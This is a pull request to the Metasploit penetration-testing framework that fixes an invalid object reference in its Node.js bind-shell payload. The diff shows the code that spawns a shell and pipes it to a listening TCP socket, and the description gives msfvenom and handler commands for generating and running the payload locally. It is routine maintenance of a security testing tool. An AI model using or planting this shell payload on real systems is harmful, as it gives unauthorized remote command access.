### PR TITLE
remove invalid 'client' object reference in nodejs

### DIFF
--- a/lib/msf/core/payload/nodejs.rb
+++ b/lib/msf/core/payload/nodejs.rb
@@ -19,11 +19,11 @@ module Msf::Payload::NodeJS
           var sh = cp.spawn(cmd, []);
           socket.pipe(sh.stdin);
           if (typeof util.pump === "undefined") {
-            sh.stdout.pipe(client.socket);
-            sh.stderr.pipe(client.socket);          
+            sh.stdout.pipe(socket);
+            sh.stderr.pipe(socket);
           } else {
-            util.pump(sh.stdout, client.socket);
-            util.pump(sh.stderr, client.socket);
+            util.pump(sh.stdout, socket);
+            util.pump(sh.stderr, socket);
           }
         });
         server.listen(#{datastore['LPORT']});

--- a/modules/payloads/singles/cmd/unix/bind_nodejs.rb
+++ b/modules/payloads/singles/cmd/unix/bind_nodejs.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 2351
+  CachedSize = 2239
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS

--- a/modules/payloads/singles/nodejs/shell_bind_tcp.rb
+++ b/modules/payloads/singles/nodejs/shell_bind_tcp.rb
@@ -13,7 +13,7 @@ require 'msf/base/sessions/command_shell'
 
 module MetasploitModule
 
-  CachedSize = 583
+  CachedSize = 555
 
   include Msf::Payload::Single
   include Msf::Payload::NodeJS


### PR DESCRIPTION
fix #9063 by removing invalid object reference introduced in PR #8825

## Verification

- [x] Set up a handler
`use exploit/multi/handler`
`set payload nodejs/shell_bind_tcp`
`set RHOST 127.0.0.1`
`set LPORT 7777`
`run`
- [x] Use patched version with various versions of node:
`msfvenom -p nodejs/shell_bind_tcp LHOST=127.0.0.1 LPORT=7777 > node_payload.js`
`node node_payload.js`
- [x] Confirm both old (pre 5.3.0) and new versions of node result in shell, not error.
